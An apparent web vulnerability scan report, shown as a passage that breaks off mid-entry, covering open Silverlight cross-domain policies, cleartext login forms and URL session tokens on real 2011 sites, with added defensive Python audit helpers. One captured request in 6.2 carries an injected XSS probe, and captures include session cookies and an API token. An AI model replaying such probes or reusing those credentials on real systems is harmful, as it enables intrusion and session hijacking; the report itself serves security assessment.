The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
xserver: www265
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://irishtimesgroup.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
xserver: www103
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://pixel.33across.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

5.8. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 14:23:29 GMT
Expires: Fri, 06 May 2011 14:23:11 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 85055
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.9. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:49 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 14:06:49 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
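A quick way to audit a clientaccesspolicy.xml before it is deployed, as an added example that is not part of this report or of the sites above: the checker parses the policy and flags a wildcard <domain uri="*"/>, a wildcard http-request-headers attribute, and a <grant-to> that exposes the whole site. Both sample policies are constructed: the captured policies in 5.8 and 5.9 are truncated after <grant-to>, so the open sample assumes a grant of / with subpaths (5.9 does show that), and the origin https://player.example.net and path /public/ in the restricted sample are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the policies captured in 5.8/5.9 above. The captures are
# truncated after <grant-to>, so the resource grant is assumed (5.9 does show path="/").
OPEN_POLICY = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""

# Hardened form: one named HTTPS origin, only the public subtree, no arbitrary headers.
# The origin and the path are placeholders, not values from the report.
RESTRICTED_POLICY = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from>
        <domain uri="https://player.example.net"/>
      </allow-from>
      <grant-to>
        <resource path="/public/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""


def audit_client_access_policy(xml_text):
    """Return a list of finding strings for a Silverlight clientaccesspolicy.xml.

    Silverlight fetches this file from the target host before it allows a cross-domain
    request, and that request goes through the browser stack with the user's cookies
    for the host, so an open policy lets any site read content as the logged-in user.
    """
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        grant = policy.find("grant-to")
        if allow is not None:
            for dom in allow.iter("domain"):
                uri = dom.get("uri", "")
                if uri == "*":
                    findings.append('allow-from: any origin (uri="*")')
                elif "*" in uri:
                    findings.append("allow-from: wildcard origin %s" % uri)
                if uri.startswith("http://"):
                    findings.append("allow-from: cleartext origin %s" % uri)
            if allow.get("http-request-headers") == "*":
                findings.append('allow-from: any request header may be sent (http-request-headers="*")')
        if grant is not None:
            for res in grant.iter("resource"):
                path = res.get("path", "")
                subpaths = res.get("include-subpaths", "false").lower() == "true"
                if path == "/" and subpaths:
                    findings.append('grant-to: entire site exposed (path="/" include-subpaths="true")')
    return findings


if __name__ == "__main__":
    for label, pol in (("open", OPEN_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(label, audit_client_access_policy(pol) or ["no findings"])
```

Run against the open sample the checker reports three findings; against the restricted one it reports none. The same idea applies to Flash's crossdomain.xml, whose `<allow-access-from domain="*"/>` is the equivalent of the wildcard here.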

6. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect (relative, so it resolves to http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect). The form (id user-login-form, method POST) contains the following password field: pass

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<form action="/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" tabindex="2" class="form-text required" />
</div>
...[SNIP]...

6.2. http://www.clashmusic.com/user/a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /user/a?destination=login_redirect (relative, so it resolves to http://www.clashmusic.com/user/a?destination=login_redirect). The form (id user-login, method POST) contains the following password field: pass

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!-- CONTENT AREA -->
                   
                    <form action="/user/a?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" size="60" tabindex="2" class="form-text required" />
<div class="description">
...[SNIP]...

6.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form which, if submitted, would be sent over clear-text HTTP. The form (id ody-login-form) has no action attribute, so its default target is the page's own URL, http://www.floridatoday.com/odygel/lib/userauth/content/login.html. The form contains the following password field: Password

Note that the form also declares onsubmit="return false", so the browser never submits it natively; the credentials are sent by the page's script (the GDN.HandleKeyPress handler attached to the field). Whether they actually cross the wire in the clear depends on where that script sends them, which this capture does not show, so confirm the finding by observing the real login request.

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...

6.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form which, if submitted, would be sent over clear-text HTTP. The form (id UAWidget-Registration) has no action attribute, so its default target is the page's own URL, http://www.floridatoday.com/odygel/lib/userauth/content/signup.html. The form contains the following password fields: Password, ConfirmPassword

As in 6.3, the form declares onsubmit="return false", so submission is handled by the page's script (GDN.HandleKeyPress) rather than by the browser. The capture shows the fields but not the request the script makes with them; confirm where the registration data is actually sent before rating this instance.

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...

6.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: ../../content/detail.aspx?id=23458 (relative, so it resolves to http://www.thevine.com.au/content/detail.aspx?id=23458). The form (id aspnetForm, method POST) is the page-wide ASP.NET form and contains the following password field: ctl00$HeaderNavigationControl$ctl00$Login1$Password

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<!--googleoff: index-->


<form name="aspnetForm" method="post" action="../../content/detail.aspx?id=23458" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="input"><input name="ctl00$HeaderNavigationControl$ctl00$Login1$Password" type="password" id="ctl00_HeaderNavigationControl_ctl00_Login1_Password" style="width:128px;" /></td>
...[SNIP]...

7. Session token in URL
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
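The check this section performs, as an added example that is not part of the report: the code pulls token-like parameters out of both the query string and Java-style ;jsessionid= path parameters, then asks the question the instances below need answered, whether a value differs per visitor or is fixed. The URLs are taken from the instances in this section; the list of suspicious parameter names is an assumption of the example, not the scanner's rule set.

```python
from urllib.parse import urlsplit, parse_qsl

# Parameter names that commonly carry a session or bearer credential. This list is an
# assumption of the example, not the scanner's rule set; treat hits as leads to confirm.
TOKEN_NAMES = {
    "sessionid", "session_id", "sessid", "sid", "jsessionid", "phpsessid", "aspsessionid",
    "cfid", "cftoken", "token", "auth", "access_token", "sessiontoken",
}


def looks_like_token_name(name):
    base = name.lower().split("[")[0]
    return base in TOKEN_NAMES or base.endswith(("token", "sessionid", "_sess"))


def find_url_session_tokens(url):
    """Return [(where, name, value)] for token-like parameters in a URL.

    Covers the query string and Java-style ';jsessionid=...' path parameters, which
    urlsplit leaves inside .path (urlparse would only split them off the last segment).
    """
    parts = urlsplit(url)
    hits = []
    for segment in parts.path.split("/"):
        for param in segment.split(";")[1:]:
            name, _, value = param.partition("=")
            if looks_like_token_name(name):
                hits.append(("path", name, value))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if looks_like_token_name(name):
            hits.append(("query", name, value))
    return hits


def classify_token(values_seen):
    """Decide, from the values one parameter took in independent captures, whether it
    behaves like a per-visitor session token or a constant embedded in the page for
    everyone. Only the per-visitor case is a session leak; a constant is a site or API
    identifier and is triaged differently."""
    if len(values_seen) < 2:
        return "undetermined (single capture)"
    return "per-visitor" if len(set(values_seen)) > 1 else "constant across captures"


# URLs from the instances in this section.
REPORT_URLS = [
    "http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent",
    "http://www.apture.com/js/apture.js?siteToken=pgKiQTB",
    "http://l.sharethis.com/pview?event=pview&source=share4x&hostname=www.orlandosentinel.com"
    "&sessionID=1304949572128.46550&fpc=23536f-12fd50e4220-5f39d80-1&ts1304949611181.0",
]


def scan_report_urls(urls=REPORT_URLS):
    """Map each URL to its token-like parameters."""
    return {u: find_url_session_tokens(u) for u in urls}


if __name__ == "__main__":
    for url, hits in scan_report_urls().items():
        print(url)
        for where, name, value in hits:
            print("   %-5s %s=%s" % (where, name, value))
    # The cars.com jsessionid comes back byte-identical in the 7.6 and 7.7 responses,
    # to two requests that carried no cars.com cookie: a template constant, not a session.
    print(classify_token(["3K2EIDRGSYOU3LAYIEVE2VA", "3K2EIDRGSYOU3LAYIEVE2VA"]))
```

The second function is the triage step the scanner cannot do on its own: capture the same URL from two unrelated clients and compare. Remember that the Referer leak described above applies whichever way the value is classified; a constant API token in a URL is still a credential that every third-party link target gets to see.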


7.1. http://api.brightcove.com/services/library

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://api.brightcove.com
Path:   /services/library

Issue detail

The URL in the request appears to contain a session token within the query string: token=f_N3PNF71c4w8kg-g49u4TbhGBRcIoWLOfzDvqnOllo.

The request is a JSONP call (callback=BCContextAware.callback) issued from an article on www.nme.com and carries no cookies, so the token is one the embedding page hands to every visitor; that points to a site-wide API token rather than a per-user session token. It is still a credential in a URL, but the exposure is of the publisher's API access, not of visitors' sessions.

Request

GET /services/library?&token=f_N3PNF71c4w8kg-g49u4TbhGBRcIoWLOfzDvqnOllo.&callback=BCContextAware.callback&command=search_videos&video_fields=id,name,shortDescription,thumbnailURL&get_item_count=true&exact=false&sort_by=PLAYS_TRAILING_WEEK:DESC&page_number=0&page_size=10&any=stevens&any=sufjan&any=watching&any=illness&any=fantastic HTTP/1.1
Host: api.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Sun, 08 May 2011 06:33:56 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/json;charset=UTF-8
Content-Length: 4196
Date: Mon, 09 May 2011 14:04:26 GMT
Server:

BCContextAware.callback({"items":[{"id":49582897001,"name":"The Flaming Lips - 'Watching The Planets' - Video Exclusive","shortDescription":"It's naked bodies galore as everyone bares all to run, cycl
...[SNIP]...

7.2. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string: sessionID=1304949572128.46550

The value has the shape of a millisecond timestamp with a suffix, and the request is a page-view beacon for the sharing widget answered with 204 No Content, so this looks like an analytics session identifier rather than an authentication token.

Request

GET /pview?event=pview&source=share4x&publisher=4b7449a5-38e2-462a-a6cd-97326133f123&hostname=www.orlandosentinel.com&location=%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&sessionID=1304949572128.46550&fpc=23536f-12fd50e4220-5f39d80-1&ts1304949611181.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 09 May 2011 14:00:18 GMT
Connection: keep-alive


7.3. http://www.apture.com/js/apture.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string: siteToken=pgKiQTB

The same value is hard-coded in the script tag that www.indianasnewscenter.com serves to every visitor (see 7.5), so it identifies the embedding site to Apture rather than the visitor, and is not a session token.

Request

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:05 GMT
Last-Modified: Mon, 09 May 2011 13:59:05 GMT
Etag: "ec25c03593279e41a51488a37cd846db"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 3794
Date: Mon, 09 May 2011 13:59:05 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488
...[SNIP]...

7.4. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string. The parameter the scanner highlighted did not survive in this copy of the report. Of the parameters visible in the request, api_key and app_id identify the Facebook application, session_version is a protocol version, and the xd_proxy.php values are cross-document messaging callbacks, none of which is a per-user session token. The response is a 302 to the no_user callback (cb=f3301b469) with no Set-Cookie header. Treat this instance as a probable false positive unless a per-user value can be identified.

Request

